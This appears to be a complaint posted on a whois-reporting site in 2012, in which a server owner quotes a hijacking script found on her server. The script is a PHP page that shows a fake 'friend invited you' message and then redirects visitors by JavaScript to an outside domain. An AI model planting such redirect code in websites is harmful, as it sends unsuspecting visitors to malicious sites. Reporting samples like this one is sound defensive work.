On my server I found various hijacking scripts like this:
<?php
echo '<h1>
You see this page because one of your friends <br> have invited you.<br>
Page loading, please wait....
</h1>';
?>
<script type="text/javascript">
setTimeout(function(){
document.location.href='http://msnb21.com';}, 3500);
Reported on: 2nd, Sep. 2012
Please help us keep Internet safer and cleaner by leaving a descriptive comment about this whois record
Complaint by Sally Kirtomy :
On my server I found various hijacking scripts like this: <?php echo '<h1> You see this page because one of your friends <br> have invited you.<br> Page loading, please wait.... </h1>'; ?> <script type="text/javascript"> setTimeout(function(){ document.location.href='http://msnb21.com';}, 3500);